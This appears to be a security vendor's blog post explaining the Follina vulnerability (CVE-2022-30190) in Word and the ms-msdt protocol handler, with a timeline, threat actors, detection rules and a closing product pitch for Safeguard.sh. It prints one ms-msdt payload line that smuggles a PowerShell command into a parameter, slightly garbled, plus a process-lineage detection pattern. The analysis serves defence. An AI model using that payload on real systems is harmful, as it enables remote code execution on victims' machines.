For years, the security industry told users the same thing: disable macros, and you are mostly safe from malicious Office documents. Follina made that advice obsolete overnight.
Discovered being actively exploited in the wild in late May 2022, CVE-2022-30190 — quickly dubbed "Follina" after the Italian town's area code (0652) found in the malicious sample — allowed attackers to achieve remote code execution through a Word document without a single macro being enabled. The exploit leveraged a protocol handler most defenders had never even considered: ms-msdt.
How Follina Works
The attack chain is deceptively simple. A Word document contains an external OLE object reference pointing to an attacker-controlled URL. When the document loads (or in some cases, when it is merely previewed in Explorer), Word fetches the remote HTML file. That HTML file contains JavaScript that invokes the ms-msdt protocol handler with crafted arguments:
ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebsrowseForFile=? /../../$(Start-Process('calc'))../../$(.444444 )"
The Microsoft Support Diagnostic Tool (MSDT) then executes the embedded PowerShell payload with the privileges of the calling user. No macro warning. No Protected View interception in many scenarios. No click required beyond opening the document.
What made Follina particularly dangerous was the attack surface it exposed. MSDT is a signed, trusted Microsoft binary. Protocol handlers are processed at the OS level, outside the Office sandbox. The combination created a direct path from document opening to arbitrary code execution that existing security controls were not designed to catch.
The Exploitation Timeline
The vulnerability had been quietly exploited before its public disclosure. Researchers later identified campaigns targeting organizations in Tibet, Russia, and Western Europe. The timeline reveals how long defenders were exposed:
- April 12, 2022: First known malicious sample uploaded to VirusTotal from a Belarusian IP address
- May 27, 2022: Security researcher Kevin Beaumont (GossTheDog) publicly analyzed a malicious document targeting users in Belarus
- May 30, 2022: Microsoft acknowledged the vulnerability and assigned CVE-2022-30190
- June 14, 2022: Microsoft released an official patch in the June 2022 Patch Tuesday update
For roughly two months, attackers had a working zero-day against every supported version of Windows. During the gap between public disclosure and patch availability, Microsoft's only mitigation guidance was to disable the MSDT URL protocol handler via registry modification:
reg delete HKEY_CLASSES_ROOT\ms-msdt /f
This was a blunt instrument. It disabled legitimate MSDT functionality, and many organizations were hesitant to deploy registry changes at scale without thorough testing.
Why Traditional Defenses Failed
Follina was effective precisely because it operated in the gaps between existing defenses:
Macro-blocking was irrelevant. The exploit used OLE object references and protocol handlers. No VBA. No macro prompt. Organizations that had spent years implementing macro-blocking policies gained zero protection.
Protected View was inconsistent. When a document was downloaded from the internet and opened in Word, Protected View should have prevented the external reference from loading. But this protection did not apply in all scenarios. Preview in Windows Explorer, opening via Rich Text Format (.rtf) files, or certain document handling paths bypassed Protected View entirely.
Antivirus detection was initially weak. The payload was executed through a legitimate Windows binary (MSDT). Many endpoint detection tools were not monitoring ms-msdt protocol invocations. The actual malicious content was fetched from a remote server, so static analysis of the document itself revealed only a URL.
Email gateways passed the documents through. Without macros to flag, many email security products treated the documents as low-risk. The malicious payload was not embedded in the document — it was fetched at runtime from an external server.
Attack Variants and Weaponization
Once the vulnerability became public, weaponization was rapid. Within days, multiple threat actors incorporated Follina into their toolkits:
Chinese APT groups used Follina-laden documents targeting the Tibetan government-in-exile and international Tibetan organizations. The documents were crafted with politically themed lures relevant to their targets.
TA413, a China-linked threat group, deployed Follina in campaigns against European government entities. The phishing lures referenced salary adjustments and official communications.
Commodity malware distributors adopted Follina for distributing QBot, AsyncRAT, and other payloads. The barrier to exploitation was extremely low — proof-of-concept code was available on GitHub within hours of public disclosure.
The RTF variant was especially concerning. An RTF file with the Follina exploit could trigger code execution simply by being previewed in the Windows Explorer preview pane. No double-click required. Just selecting the file in a directory listing was enough.
The Protocol Handler Problem
Follina exposed a systemic issue in Windows security architecture. Protocol handlers — URI schemes like ms-msdt:, ms-excel:, ms-word:, and dozens of others — create pathways between applications that bypass many security boundaries.
Each protocol handler is a potential attack surface. When a handler invokes a complex application like MSDT with attacker-controlled arguments, the result is equivalent to command injection. The Windows ecosystem has accumulated hundreds of registered protocol handlers over decades of backward compatibility, and auditing all of them for security implications is a massive undertaking.
Microsoft's response to Follina extended beyond just patching the specific vulnerability. In subsequent updates, they began reviewing and restricting protocol handler behavior more broadly, but the fundamental architecture remains.
Detection and Response Strategies
Organizations that detected Follina exploitation early shared common characteristics in their detection capabilities:
Process lineage monitoring was the most reliable detection method. Alerts on msdt.exe being spawned as a child process of winword.exe, excel.exe, or outlook.exe caught the exploitation chain. The key was monitoring process parent-child relationships, not just individual process execution.
Parent Process: WINWORD.EXE
Child Process: msdt.exe
Command Line: contains "PCWDiagnostic" and "IT_RebrowseForFile"
Network monitoring for Office applications making outbound HTTP requests to fetch HTML content also proved effective. Word documents should rarely need to fetch content from arbitrary external URLs during normal operation.
Sysmon logging with appropriate configuration captured the full exploitation chain. Events of interest included process creation (Event ID 1), network connections from Office processes (Event ID 3), and DNS queries from unexpected processes (Event ID 22).
Lessons for Supply Chain Security
Follina carries important lessons that extend well beyond the specific vulnerability:
Trusted binaries are attack vectors. MSDT is a signed Microsoft binary. Attackers increasingly target legitimate tools and processes — a technique collectively known as living-off-the-land. Supply chain security must account for the fact that trusted software can be weaponized.
Defense-in-depth assumptions can be wrong. Many organizations believed their layered defenses (email gateway + macro blocking + endpoint protection) adequately addressed document-based attacks. Follina revealed that all three layers could be bypassed simultaneously by a single technique.
Legacy features create lasting risk. The ms-msdt protocol handler existed for backward compatibility with older diagnostic workflows. In software supply chains, legacy components, deprecated APIs, and backward-compatible features accumulate as hidden attack surface. Inventorying and managing this surface is essential.
Patching is not instant. Two weeks elapsed between public exploitation and the official patch. Organizations need detection and mitigation capabilities that operate independently of vendor patches. Relying solely on patching means accepting whatever window of exposure the vendor's release cycle imposes.
How Safeguard.sh Helps
Follina demonstrated that understanding your software components — including the protocol handlers, legacy features, and trusted binaries in your environment — is a prerequisite for effective defense. Safeguard.sh provides deep software inventory capabilities that go beyond simple dependency lists.
With Safeguard.sh, organizations can maintain comprehensive SBOMs that track not just third-party libraries but the full software surface area deployed across their environments. When vulnerabilities like Follina emerge, having an accurate inventory means you can immediately identify which systems are exposed, which mitigation steps apply, and which detection rules need deployment. Safeguard.sh's continuous monitoring flags newly disclosed vulnerabilities against your existing inventory, compressing the time between disclosure and informed response from days to minutes.
Rather than scrambling to determine exposure after each zero-day disclosure, Safeguard.sh customers know their attack surface before the exploit lands.